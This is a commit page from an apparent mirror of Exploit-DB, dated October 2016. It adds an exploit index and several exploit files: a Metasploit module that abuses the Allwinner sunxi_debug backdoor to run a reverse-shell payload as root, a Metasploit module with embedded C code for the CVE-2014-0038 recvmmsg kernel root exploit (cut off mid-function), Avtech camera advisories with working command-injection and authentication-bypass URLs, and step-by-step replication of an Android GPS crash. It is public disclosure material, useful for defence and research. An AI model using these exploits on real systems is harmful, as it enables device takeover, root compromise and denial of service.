bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-10-12

Browse source 
12 new exploits

Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation
Spacemarc News - Cross-Site Request Forgery (Add New Post)
Minecraft Launcher - Insecure File Permissions Privilege Escalation
BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery
phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery
sheed AntiVirus - Unquoted Service Path Privilege Escalation
AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities
RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection
Android - 'gpsOneXtra' Data Files Denial of Service
Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit)
Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)
ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting
ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
This commit is contained in:
Offensive Security 2016-10-12 05:01:17 +00:00
parent a3dbf3113e
commit f8b17d14a1
13 changed files with 1496 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -36606,7 +36606,19 @@ id,file,description,date,author,platform,type,port
40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0
40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
40494,platforms/windows/local/40494.txt,"Minecraft Launcher - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
40495,platforms/php/webapps/40495.html,"BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80
40496,platforms/php/webapps/40496.html,"phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80
40497,platforms/windows/local/40497.txt,"sheed AntiVirus - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
40500,platforms/cgi/webapps/40500.txt,"AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",cgi,webapps,80
40501,platforms/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",xml,webapps,0
40502,platforms/android/dos/40502.txt,"Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0
40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
40505,platforms/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting",2016-10-11,Besim,php,webapps,0
40506,platforms/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,php,webapps,0

Can't render this file because it is too large.

234
platforms/android/dos/40502.txt Executable file
View file

@ -0,0 +1,234 @@
Original at:
https://wwws.nightwatchcybersecurity.com/2016/10/04/advisory-cve-2016-5348-2/
Summary
Android devices can be crashed remotely forcing a halt and then a soft
reboot by a MITM attacker manipulating assisted GPS/GNSS data provided
by Qualcomm. This issue affects the open source code in AOSP and
proprietary code in a Java XTRA downloader provided by Qualcomm. The
Android issue was fixed by in the October 2016 Android bulletin.
Additional patches have been issued by Qualcomm to the proprietary
client in September of 2016. This issue may also affect other
platforms that use Qualcomm GPS chipsets and consume these files but
that has not been tested by us, and requires further research.
Background GPS and gpsOneXtra
Most mobile devices today include ability to locate themselves on the
Earths surface by using the Global Positioning System (GPS), a system
originally developed and currently maintained by the US military.
Similar systems developed and maintained by other countries exist as
well including Russias GLONASS, Europes Galileo, and Chinas Beidou.
The GPS signals include an almanac which lists orbit and status
information for each of the satellites in the GPS constellation. This
allows the receivers to acquire the satellites quicker since the
receiver would not need to search blindly for the location of each
satellite. Similar functionality exists for other GNSS systems. In
order to solve the problem of almanac acquisition, Qualcomm developed
the gpsOneXtra system in 2007 (also known as IZat XTRA Assistance
since 2013). This system provides ability to GPS receivers to download
the almanac data over the Internet from Qualcomm-operated servers. The
format of these XTRA files is proprietary but seems to contain current
satellite location data plus estimated locations for the next 7 days,
as well as additional information to improve signal acquisition. Most
Qualcomm mobile chipsets and GPS chips include support for this
technology. A related Qualcomm technology called IZat adds ability to
use WiFi and cellular networks for locations in addition to GPS.
Background Android and gpsOneXtra Data Files
During our network monitoring of traffic originating from an Android
test device, we discovered that the device makes periodic calls to the
Qualcomm servers to retrieve gpsOneXtra assistance files. These
requests were performed almost every time the device connected to a
WiFi network. As discovered by our research and confirmed by the
Android source code, the following URLs were used:
http://xtra1.gpsonextra.net/xtra.bin
http://xtra2.gpsonextra.net/xtra.bin
http://xtra3.gpsonextra.net/xtra.bin
http://xtrapath1.izatcloud.net/xtra2.bin
http://xtrapath2.izatcloud.net/xtra2.bin
http://xtrapath3.izatcloud.net/xtra2.bin
WHOIS record show that both domains gpsonextra.net and izatcloud.net
are owned by Qualcomm. Further inspection of those URLs indicate that
both domains are being hosted and served from Amazons Cloudfront CDN
service (with the exception of xtra1.gpsonextra.net which is being
served directly by Qualcomm). On the Android platform, our inspection
of the Android source code shows that the file is requested by an
OS-level Java process (GpsXtraDownloader.java), which passes the data
to a C++ JNI class
(com_android_server_location_GnssLocationProvider.cpp), which then
injects the files into the Qualcomm modem or firmware. We have not
inspected other platforms in detail, but suspect that a similar
process is used. Our testing was performed on Android v6.0, patch
level of January 2016, on a Motorola Moto G (2nd gen) GSM phone, and
confirmed on a Nexus 6P running Android v6.01, with May 2016 security
patches. Qualcomm has additionally performed testing on their
proprietary Java XTRA downloader client confirming this vulnerability.
Vulnerability Details
Android platform downloads XTRA data files automatically when
connecting to a new network. This originates from a Java class
(GpsXtraDownloader.java), which then passes the file to a C++/JNI
class (com_android_server_location_GnssLocationProvider.cpp) and then
injects it into the Qualcomm modem.
The vulnerability is that both the Java and the C++ code do not check
how large the data file actually is. If a file is served that is
larger than the memory available on the device, this results in all
memory being exhausted and the phone halting and then soft rebooting.
The soft reboot was sufficient to recover from the crash and no data
was lost. While we have not been able to achieve remote code execution
in either the Qualcomm modem or in the Android OS, this code path can
potentially be exploited for such attacks and would require more
research.
To attack, an MITM attacker located anywhere on the network between
the phone being attacked and Qualcomms servers can initiate this
attack by intercepting the legitimate requests from the phone, and
substituting their own, larger files. Because the default Chrome
browser on Android reveals the model and build of the phone (as we
have written about earlier), it would be possible to derive the
maximum memory size from that information and deliver the
appropriately sized attack file. Possible attackers can be hostile
hotspots, hacked routers, or anywhere along the backbone. This is
somewhat mitigated by the fact that the attack file would need to be
as large as the memory on the phone.
The vulnerable code resides here (GpsXtraDownloader.java, lines 120-127):
connection.connect()
int statusCode = connection.getResponseCode();
if (statusCode != HttpURLConnection.HTTP_OK) {
if (DEBUG) Log.d(TAG, “HTTP error downloading gps XTRA: “ + statusCode);
return null;
}
return Streams.readFully(connection.getInputStream());
Specifically, the affected code is using Streams.readFully to read the
entire file into memory without any kind of checks on how big the file
actually is.
Additional vulnerable code is also in the C++ layer
(com_android_server_location_GnssLocationProvider.cpp, lines 856-858):
jbyte* bytes = (jbyte *)env->GetPrimitiveArrayCritical(data, 0);
sGpsXtraInterface->inject_xtra_data((char *)bytes, length);
env->ReleasePrimitiveArrayCritical(data, bytes, JNI_ABORT);
Once again, no size checking is done. We were able to consistently
crash several different Android phones via a local WiFi network with
the following error message:
java.lang.OutOfMemoryError: Failed to allocate a 478173740 byte
allocation with 16777216 free bytes and 252MB until OOM
at java.io.ByteArrayOutputStream.expand(ByteArrayOutputStream.java:91)
(It should be noted that we were not able to consistently and reliable
achieve a crash in the C++/JNI layer or the Qualcomm modem itself)
Steps To Replicate (on Ubuntu 16.04)
1. Install DNSMASQ:
sudo apt-get install dnsmasq
2. Install NGINX:
sudo apt-get install nginx
3. Modify the /etc/hosts file to add the following entries to map to
the IP of the local computer (varies by vendor of the phone):
192.168.1.x xtra1.gpsonextra.net
192.168.1.x xtra2.gpsonextra.net
192.168.1.x xtra3.gpsonextra.net
192.168.1.x xtrapath1.izatcloud.net
192.168.1.x xtrapath2.izatcloud.net
192.168.1.x xtrapath3.izatcloud.net
4. Configure /etc/dnsmasq.conf file to listed on the IP:
listen-address=192.168.1.x
5. Restart DNSMASQ:
sudo /etc/init.d/dnsmasq restart
6. Use fallocate to create the bin files in “/var/www/html/”
sudo fallocate -s 2.5G xtra.bin
sudo fallocate -s 2.5G xtra2.bin
sudo fallocate -s 2.5G xtra3.bin
7. Modify the settings on the Android test phone to static, set DNS to
point to “192.168.1.x”. AT THIS POINT Android will resolve DNS
against the local computer, and serve the GPS files from it.
To trigger the GPS download, disable WiFi and enable Wifi, or
enable/disable Airplane mode. Once the phone starts downloading the
files, the screen will go black and it will reboot.
PLEASE NOTE: on some models, the XTRA file is cached and not retrieved
on every network connect. For those models, you may need to reboot the
phone and/or follow the injection commands as described here. You can
also use an app like GPS Status and ToolboxGPS Status and Toolbox.
The fix would be to check for file sizes in both Java and native C++ code.
Mitigation Steps
For the Android platform, users should apply the October 2016 Android
security bulletin and any patches provided by Qualcomm. Please note
that as per Qualcomm, the patches for this bug only include fixes to
the Android Open Source Project (AOSP) and the Qualcomm Java XTRA
downloader clients. Apple and Microsoft have indicated to us via email
that GPS-capable devices manufactured by them including iPad, iPhones,
etc. and Microsoft Surface and Windows Phone devices are not affected
by this bug. Blackberry devices powered by Android are affected but
the Blackberry 10 platform is not affected by this bug. For other
platforms, vendors should follow guidance provided by Qualcomm
directly via an OEM bulletin.
Bounty Information
This bug has fulfilled the requirements for Googles Android Security
Rewards and a bounty has been paid.
References
Android security bulletin: October 2016
CERT/CC tracking: VR-179
CVE-ID: CVE-2016-5348
Google: Android bug # 213747 / AndroidID-29555864
CVE Information
As provided by Qualcomm:
CVE: CVE-2016-5348
Access Vector: Network
Security Risk: High
Vulnerability: CWE-400: Uncontrolled Resource Consumption (Resource
Exhaustion)
Description: When downloading a very large assistance data file, the
client may crash due to out of memory error.
Change summary:
check download size ContentLength before downloading data
catch OOM exception
Credits
We would like to thank CERT/CC for helping to coordinate this process,
and all of the vendors involved for helpful comments and a quick
turnaround. This bug was discovered by Yakov Shafranovich, and the
advisory was also written by Yakov Shafranovich.
Timeline
201606-20: Android bug report filed with Google
2016-06-21: Android bug confirmed
2016-06-21: Bug also reported to Qualcomm and CERT.
2016-09-14: Coordination with Qualcomm on public disclosure
2016-09-15: Coordination with Google on public disclosure
2016-10-03: Android security bulletin released with fix
2016-10-04: Public disclosure

83
platforms/android/local/40504.rb Executable file
View file

@ -0,0 +1,83 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
"Name" => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
"Description" => %q{
This module attempts to exploit a debug backdoor privilege escalation in
Allwinner SoC based devices.
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
Vulnerable OS: all OS images available for Orange Pis,
any for FriendlyARM's NanoPi M1,
SinoVoip's M2+ and M3,
Cuebietech's Cubietruck +
Linksprite's pcDuino8 Uno
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
},
"License" => MSF_LICENSE,
"Author" =>
[
"h00die <mike@stcyrsecurity.com>", # Module
"KotCzarny" # Discovery
],
"Platform" => [ "android", "linux" ],
"DisclosureDate" => "Apr 30 2016",
"DefaultOptions" => {
"payload" => "linux/armle/mettle/reverse_tcp"
},
"Privileged" => true,
"Arch" => ARCH_ARMLE,
"References" =>
[
[ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
[ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \
"https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
[ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
],
"SessionTypes" => [ "shell", "meterpreter" ],
'Targets' =>
[
[ 'Auto', { } ]
],
'DefaultTarget' => 0,
))
end
def check
backdoor = '/proc/sunxi_debug/sunxi_debug'
if file_exist?(backdoor)
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
backdoor = '/proc/sunxi_debug/sunxi_debug'
if file_exist?(backdoor)
pl = generate_payload_exe
exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
vprint_good "Backdoor Found, writing payload to #{exe_file}"
write_file(exe_file, pl)
cmd_exec("chmod +x #{exe_file}")
vprint_good 'Escalating'
cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
else
print_error "Backdoor #{backdoor} not found."
end
end
end

218
platforms/cgi/webapps/40500.txt Executable file
View file

@ -0,0 +1,218 @@
Avtech devices multiple vulnerabilities
--------------------------------------------------
Platforms / Firmware confirmed affected:
- Every Avtech device (IP camera, NVR, DVR) and firmware version. [4]
contains the list of confirmed firmware versions, which are affected.
- Product page: http://www.avtech.com.tw/
ôAVTECH, founded in 1996, is one of the worldÆs leading CCTV
manufacturers. With stably increasing revenue and practical business
running philosophy, AVTECH has been ranked as the largest public-listed
company among the Taiwan surveillance industry. AVTECH makes every
effort on the innovation of technology, product and implementation.
Based on years of research and industry experience, AVTECH has obtained
a leading position on mobile platform support and provides a full range
of surveillance products.ö
Avtech is the second most popular search term in Shodan. According to
Shodan, more than 130.000 Avtech devices are exposed to the internet.
Vulnerabilities
---------------
1) Plaintext storage of administrative password
Every user password is stored in clear text. An attacker with access to
the device itself can easily obtain the full list of passwords. By
exploiting command injection or authentication bypass issues, the clear
text admin password can be retrieved.
2) Missing CSRF protection
The web interface does not use any CSRF protection. If a valid session
exists for the user, the attacker can modify all settings of the device
via CSRF. If there is no valid session, but the user did not change the
default admin password, the attacker can log in as admin via CSRF as well.
3) Unauthenticated information disclosure
Under the /cgi-bin/nobody folder every CGI script can be accessed
without authentication.
POC: GET /cgi-bin/nobody/Machine.cgi?action=get_capability
Example response:
Firmware.Version=1011-1005-1008-1002
MACAddress=00:0E:53:xx:xx:xx
Product.Type=DVR
Product.ID=308B
Product.ShortName=V_full_Indep,V_Multistream
Video.System=PAL
Audio.DownloadFormat=ULAW
Video.Input.Num=8
Video.Output.Num=1
Video.Format=H264,MJPEG
Video.Format.Default=H264
Video.Resolution=4CIF,CIF
Video.Quality=BEST,HIGH,NORMAL,BASIC
Video.Local.Input.Num=8
Video.Local.Output.Num=1
Video.Local.Format=H264,MJPEG
Audio.Input.Num=8
Audio.Output.Num=1
Audio.Format=ULAW
Audio.Local.Input.Num=8
Audio.Local.Output.Num=1
Audio.Local.Format=PCM
Language.Default=ENGLISH
Language.Support=ENGLISH&CHINESE&JAPANESE&FRANCE&GERMAN&SPANISH&PORTUGUESE&ITALIAN&TURKISH&POLISH&RUSSIAN&CUSTOMIZE&THAI
&VIETNAM&DUTCH&GREEK&ARABIC&CZECH&HUNGARIAN&HEBREW&CHINA&
Capability=D0,80,A,80
PushNotify.MaxChannel=8
4) Unauthenticated SSRF in DVR devices
In case of DVR devices, Search.cgi can be accessed without
authentication. This service is responsible for searching and accessing
IP cameras in the local network. In newer firmware versions, Search.cgi
provides the cgi_query action, which performs an HTTP request with the
specified parameters. By modifying the ip, port and queryb64str
parameters, an attacker is able to perform arbitrary HTTP requests
through the DVR device without authentication.
POC:
http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==
5) Unauthenticated command injection in DVR devices
The cgi_query action in Search.cgi performs HTML requests with the wget
system command, which uses the received parameters without sanitization
or verification. By exploiting this issue, an attacker can execute any
system command with root privileges without authentication.
POC:
http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(ps|grep%20Search.cgi|grep%20-v%20grep|head%20-n%201|awk%20'{print%20"/tmp/"$1".log"}');&password=admin
6) Authentication bypass #1
Video player plugins are stored as .cab files in the web root, which can
be accessed and downloaded without authentication. The cab file request
verification in the streamd web server is performed with the strstr
function, which means that a request should not be authenticated if it
contains the ô.cabö string anywhere in the URL. We note that some of the
models contain an additional check in the CgiDaemon, which allows
unauthenticated cgi access only under the /cgi-bin/nobody folder.
POC:
http://<device_ip>/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
7) Authentication bypass #2
Cgi scripts in the /cgi-bin/nobody folder can be accessed without
authentication (e.g. for login). The streamd web server verifies whether
the request can be performed without authentication by searching for the
ô/nobodyö string in the URL with the strstr function. Thus, if a
request contains the "/nobody" string anywhere in the URL, it does not
have to be authenticated. We note that some of the models contain an
additional check in the CgiDaemon, which allows unauthenticated cgi
access only under the /cgi-bin/nobody folder.
POC:
http://<device_ip>/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*
8) Unauthenticated file download from web root
If a cab file is requested, the web server sends the file without
processing it. Because the streamd web server verifies the cab file
request by searching for the ô.cabö string in the URL with the strstr
function, any file (even the cgi scripts) in the web root can be
downloaded without authentication.
POC: http://<device_ip>/cgi-bin/cgibox?.cab
9) Login captcha bypass #1
To prevent brute-forcing attempts, Avtech devices require a captcha for
login requests. However, if the login requests contain the login=quick
parameter, the captcha verification is bypassed.
POC:
http://<device_ip>/cgi-bin/nobody/VerifyCode.cgi?account=<b64(username:password)>&login=quick
10) Login captcha bypass #2
Instead of using a random session ID, Avtech devices use the
base64-encoded username and password as the Cookie value. Since the IP
address of the logged in user is not stored, if an attacker sets the
Cookie manually, the captcha verification can by bypassed easily.
11) Authenticated command injection in CloudSetup.cgi
Devices that support the Avtech cloud contain CloudSetup.cgi, which can
be accessed after authentication. The exefile parameter of a
CloudSetup.cgi request specifies the system command to be executed.
Since there is no verification or white list-based checking of the
exefile parameter, an attacker can execute arbitrary system commands
with root privileges.
POC: http://<device_ip>/cgi-bin/supervisor/CloudSetup.cgi?exefile=ps
12) Authenticated command injection in adcommand.cgi
Some of the Avtech devices contain adcommand.cgi to perform ActionD
commands. The adcommand.cgi can be accessed after authentication. In
newer devices the ActionD daemon provides the DoShellCmd function, which
performs a system call with the specified parameters. Since there is no
verification or white list-based checking of the parameter of the
DoShellCmd function, an attacker can execute arbitrary system commands
with root privileges.
POC:
POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1
Host: <device_ip>
Content-Length: 23
Cookie: SSID=YWRtaW46YWRtaW4=
DoShellCmd "strCmd=ps&"
13) Authenticated command injection in PwdGrp.cgi
The PwdGrp.cgi uses the username, password and group parameters in a new
user creation or modification request in a system command without
validation or sanitization. Thus and attacker can execute arbitrary
system commands with root privileges.
We are aware that this vulnerability is being exploited in the wild!
POC:
http://<device_ip>/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN
14) HTTPS used without certificate verification
The SyncCloudAccount.sh, QueryFromClient.sh and SyncPermit.sh scripts
use wget to access HTTPS sites, such as https://payment.eagleeyes.tw, by
specifying the no-check-certificate parameter. Thus wget skips server
certificate verification and a MITM attack is possible against the HTTPS
communication.
Timeline
2015.10.19: First attempt to contact with Avtech, but we did not receive
any response
2016.05.24: Second attempt to contact Avtech without any response
2016.05.27: Third attempt to contact Avtech by sending e-mail to public
Avtech e-mail addresses. We did not receive any response.
2016.xx.xx: Full disclosure
POC
---
POC script is available to demonstrate the following problems [3]:
- Unauthenticated information leakage (capabilities)
- Authentication bypass (.cab, nobody)
- Unauthenticated SSRF on DVR devices
- Unauthenticated command injection on DVR devices
- Login captcha bypass with login=quick or manual cookie creation
- CloudSetup.cgi command injection after authentication
- adcommand.cgi command injection after authentication
A video demonstration is also available [1], which presents some of the
above problems.
Recommendations
---------------
Unfortunately there is no solution available for these vulnerabilities
at the moment. You can take the following steps to protect your device:
- Change the default admin password
- Never expose the web interface of any Avtech device to the internet
We note that the above vulnerabilities were found within a short period
of time without a systematic approach. Based on the vulnerability types
we found and the overall code quality, the devices should contain much
more problems.
Credits
-------
This vulnerability was discovered and researched by Gergely Eberhardt
(@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)
References
----------
[1]
https://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities
<http://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities>
[2] https://youtu.be/BUx8nLlIMxI
[3] https://github.com/ebux/AVTECH
[4] http://www.search-lab.hu/media/vulnerability_matrix.txt

354
platforms/linux/local/40503.rb Executable file
View file

@ -0,0 +1,354 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation',
'Description' => %q{
This module attempts to exploit CVE-2014-0038, by sending a recvmmsg
system call with a crafted timeout pointer parameter to gain root.
This exploit has offsets for 3 Ubuntu 13 kernels built in:
3.8.0-19-generic (13.04 default)
3.11.0-12-generic (13.10 default)
3.11.0-15-generic (13.10)
This exploit may take up to 13 minutes to run due to a decrementing (1/sec)
pointer which starts at 0xff*3 (765 seconds)
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # Module
'rebel' # Discovery
],
'DisclosureDate' => 'Feb 2 2014',
'Platform' => [ 'linux'],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Auto', { } ]
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true, },
'References' =>
[
[ 'EDB', '31347'],
[ 'EDB', '31346'],
[ 'CVE', '2014-0038'],
[ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900']
]
))
register_options(
[
OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
], self.class)
end
def check
def kernel_vuln?()
os_id = cmd_exec('grep ^ID= /etc/os-release')
if os_id == 'ID=ubuntu'
kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
case kernel.release.to_s
when '3.11.0'
if kernel == Gem::Version.new('3.11.0-15-generic') || kernel == Gem::Version.new('3.11.0-12-generic')
vprint_good("Kernel #{kernel} is exploitable")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
return false
end
when '3.8.0'
if kernel == Gem::Version.new('3.8.0-19-generic')
vprint_good("Kernel #{kernel} is exploitable")
return true
else
print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
return false
end
else
print_error("Non-vuln kernel #{kernel}")
return false
end
else
print_error("Unknown OS: #{os_id}")
return false
end
end
if kernel_vuln?()
return CheckCode::Appears
else
return CheckCode::Safe
end
end
def exploit
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
end
# direct copy of code from exploit-db. I removed a lot of the comments in the title area just to cut down on size
recvmmsg = %q{
/*
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
CVE-2014-0038 / x32 ABI with recvmmsg
by rebel @ irc.smashthestack.org
-----------------------------------
*/
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/utsname.h>
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
#define VLEN 1
#define BUFSIZE 200
int port;
struct offset {
char *kernel_version;
unsigned long dest; // net_sysctl_root + 96
unsigned long original_value; // net_ctl_permissions
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
};
struct offset offsets[] = {
{"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
{"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
{"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
{NULL,0,0,0,0}
};
void udp(int b) {
int sockfd;
struct sockaddr_in servaddr,cliaddr;
int s = 0xff+1;
if(fork() == 0) {
while(s > 0) {
fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
sleep(1);
s--;
fprintf(stderr,".");
}
sockfd = socket(AF_INET,SOCK_DGRAM,0);
bzero(&servaddr,sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
servaddr.sin_port=htons(port);
sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
exit(0);
}
}
void trigger() {
open("/proc/sys/net/core/somaxconn",O_RDONLY);
if(getuid() != 0) {
fprintf(stderr,"not root, ya blew it!\n");
exit(-1);
}
fprintf(stderr,"w00p w00p!\n");
system("/bin/sh -i");
}
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
// thx bliss
static int __attribute__((regparm(3)))
getroot(void *head, void * table)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
void __attribute__((regparm(3)))
trampoline()
{
asm("mov $getroot, %rax; call *%rax;");
}
int main(void)
{
int sockfd, retval, i;
struct sockaddr_in sa;
struct mmsghdr msgs[VLEN];
struct iovec iovecs[VLEN];
char buf[BUFSIZE];
long mmapped;
struct utsname u;
struct offset *off = NULL;
uname(&u);
for(i=0;offsets[i].kernel_version != NULL;i++) {
if(!strcmp(offsets[i].kernel_version,u.release)) {
off = &offsets[i];
break;
}
}
if(!off) {
fprintf(stderr,"no offsets for this kernel version..\n");
exit(-1);
}
mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
mmapped &= 0x000000ffffffffff;
srand(time(NULL));
port = (rand() % 30000)+1500;
commit_creds = (_commit_creds)off->commit_creds;
prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(mmapped == -1) {
perror("mmap()");
exit(-1);
}
memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
perror("mprotect()");
exit(-1);
}
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(-1);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(-1);
}
memset(msgs, 0, sizeof(msgs));
iovecs[0].iov_base = &buf;
iovecs[0].iov_len = BUFSIZE;
msgs[0].msg_hdr.msg_iov = &iovecs[0];
